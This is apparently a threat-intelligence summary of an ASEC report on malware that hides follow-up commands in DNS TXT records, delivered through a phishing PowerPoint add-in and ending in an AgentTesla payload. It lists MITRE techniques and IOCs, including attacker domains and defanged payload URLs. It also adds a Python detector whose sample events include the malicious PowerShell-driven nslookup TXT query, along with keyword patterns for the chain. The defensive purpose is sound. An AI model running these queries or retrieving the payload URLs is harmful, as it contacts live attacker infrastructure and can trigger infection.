Malware Execution Method Using DNS TXT Record – ASEC BLOG

ASEC documents a malware execution technique that leverages DNS TXT records — a relatively uncommon method that can aid in command retrieval and evasion. The activity includes phishing with a PPAM PowerPoint add-in, PowerShell-driven nslookup, DNS TXT data storage, and remote DLL/AgentTesla payloads associated with Hagga/Aggah. #Aggah #Hagga #abena-dk.cam #AgentTesla #PPAM #PowerShell #DNS

Keypoints

  • DNS TXT records are used during malware execution, a method not widely utilized for this purpose.
  • Phishing email delivers a PowerPoint add-in (PPAM) with macros to trigger the attack.
  • The macro uses PowerShell to run nslookup and then queries DNS TXT records as part of the kill chain.
  • Threat actors embed commands for subsequent steps inside DNS TXT records to evade detection.
  • The threat actor's DNS TXT responses differ from those of normal TXT records; the infrastructure includes multiple abena-dk.cam subdomains and test records tied to calc/vbs activity.
  • The payload chain downloads a Base64-encoded DLL from an external URL and executes it in memory, linked to Hagga/Aggah and AgentTesla.
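As an added detection example (not code from the ASEC post), the following Python scores constructed Sysmon-style process-creation events for the chain above (Office application spawning PowerShell, PowerShell driving an nslookup TXT query) and applies a simple heuristic to TXT answers; the field names and all sample telemetry are assumptions.

```python
import re

# Constructed process-creation events in a Sysmon Event ID 1 style; the field
# names (ParentImage, Image, CommandLine) are assumptions about your telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -c "nslookup -type=txt blessed.abena-dk.cam"'},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup -type=txt blessed.abena-dk.cam"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\nslookup.exe",
     "CommandLine": "nslookup mail.example.com"},            # ordinary admin lookup
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Process"},            # ordinary PowerShell use
]

OFFICE_APPS = ("powerpnt.exe", "winword.exe", "excel.exe")
TXT_QUERY = re.compile(r"\bnslookup\b.*-(?:q|type|querytype)=txt\b", re.IGNORECASE)
SCRIPT_MARKERS = ("powershell", "iex", "invoke-expression")
BASE64_RUN = re.compile(r"[A-Za-z0-9+/]{60,}={0,2}")   # long Base64 run, as in an encoded binary

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the reasons an event matches the chain (empty list = no match)."""
    parent, image, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    reasons = []
    if parent in OFFICE_APPS and image == "powershell.exe":
        reasons.append("Office application spawned PowerShell")
    if TXT_QUERY.search(cmd):
        reasons.append("nslookup TXT record query")
        if "powershell.exe" in (parent, image):
            reasons.append("TXT query driven by PowerShell")
    return reasons

def detect(events):
    """Events worth an alert, paired with their reasons."""
    return [(ev["CommandLine"], r) for ev in events if (r := score_event(ev))]

def suspicious_txt_answer(txt):
    """Heuristic on a TXT answer: script keywords or a long Base64 run; SPF/DKIM/DMARC stay clean."""
    low = txt.lower()
    if low.startswith(("v=spf1", "v=dkim1", "v=dmarc1")):
        return False
    return any(m in low for m in SCRIPT_MARKERS) or BASE64_RUN.search(txt) is not None
```

Run `detect(SAMPLE_EVENTS)` to see the two chain events flagged while the two ordinary events pass, and feed `suspicious_txt_answer` the TXT answers from your resolver logs.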

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – “The threat actor attached a PowerPoint add-in (PPAM) file pretending to be an ‘Order Inquiry’ in a phishing email.”
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – the PowerPoint macro executes code; the macro code itself is simple and only triggers the later steps.
  • [T1059.001] Command and Scripting Interpreter: PowerShell – “the nslookup management tool is being executed through PowerShell.”
  • [T1071.004] Application Layer Protocol: DNS – “the DNS TXT record is queried afterward.”
  • [T1105] Ingress Tool Transfer – “downloads a Base64-encoded binary from another external URL through PowerShell.”
  • [T1055] Process Injection – “threat actor is making various attempts on child processes to evade detection by anti-malware products.”

Indicators of Compromise

  • [Hash] File Hash – f6b8a4c6ed15a1a17896797ce3fe2440, 4a647e9baffe95acb9e2ec989b23808b – used as payload indicators
  • [Domain] Domains – abena-dk.cam, calc.abena-dk.cam, blessed.abena-dk.cam, methew.abena-dk.cam
  • [URL] External payload sources – hxxps://bitbucket[.]org/mounmeinlylo/rikirollin/downloads/methewPayload.js, hxxps://bitbucket[.]org/mounmeinlylo/rikirollin/downloads/blessed_Payload.js

Read more: https://asec.ahnlab.com/en/54916/